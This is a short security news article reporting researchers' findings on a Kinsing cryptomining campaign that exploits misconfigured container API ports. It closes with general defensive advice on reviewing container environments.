April 7, 2020 By Shane Schick 2 min read

A misconfigured API port has led to a months-long campaign in which cybercriminals have been launching daily Kinsing malware attacks that number in the thousands, according to security researchers.

Directed at enterprises operating container environments, the cryptocurrency miner exploits the API port on a host running Ubuntu and then tries to infect an ever-larger number of hosts, a report from Aqua Security noted.

Hackers rigged the Ubuntu container to clear logs, eliminate other malicious software and disable security protections. Once those tasks have been completed, the Kinsing malware download begins in order to mine for cryptocurrency on the compromised container.

An Ambitious Attack Scheme

Researchers said the exploit attempts to continue infecting other parts of the container network by using SSH credentials it collects along the way.

This allows cybercriminals to test an extensive number of key combinations and user account possibilities, researchers added. If successful, a shell script then places the cryptocurrency miner on the infected host.

The investigation traced the origins of the campaign to Eastern Europe, where command-and-control (C&C) servers split the various functions required to manage the attacks. While miners can be designed for many different kinds of cryptocurrencies, the target, in this case, is bitcoin, researchers said.

Although the campaign was described in the report as ambitious, researchers suggested that the rise of cloud-native environments and the increased use of containers will make more cybercriminals follow similarly sophisticated approaches.

Don’t Let Kinsing Lead to Crypto-Mining

The obvious step for anyone vulnerable to an attack is to conduct a thorough review of their container environments. This should include looking for suspicious user activity in log files and checking for any areas where least privilege settings should be, but haven’t been, enforced.

Beyond that, organizations need to recognize where container security responsibilities lie. Some areas may be dealt with by providers but others — including vulnerability management and continuous event monitoring — should be directly under the IT security team’s control.

More from

Another category? Why we need ITDR

5 min read - Technologists are understandably suffering from category fatigue. This fatigue can be more pronounced within security than in any other sub-sector of IT. Do the use cases and risks of today warrant identity threat detection and response (ITDR)? To address this question, we work backwards from the vulnerabilities, threats, misconfigurations and attacks that IDTR specializes in providing visibility into. As identity threat detection and response (ITDR) technology evolves, one of the most common queries we get is: “Why do we need…

On holiday: Most important policies for reduced staff

4 min read - On Christmas Eve, 2023, the Ohio State Lottery had to shut down some of its systems because of a cyberattack. Around the same time, the Dark Web had a “Leaksmas” event, where cyber criminals shared stolen information for free as a holiday gift. In fact, the month of December 2023 saw more than 2 billion records breached and 1,351 disclosed security incidents, according to research from IT Governance — an increase of 332% and 187%, respectively, over the month of…

How I got started: Incident responder

3 min read - As a cybersecurity incident responder, life can go from chill to chaos in seconds. What is it about being an incident responder that makes people want to step up for this crucial cybersecurity role?With our How I Got Started series, we learn from experts in their field and find out how they got started and what advice they have for anyone looking to get into the field.In this Q&A, we spoke with IBM’s own Dave Bales, co-lead X-Force Incident Command…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today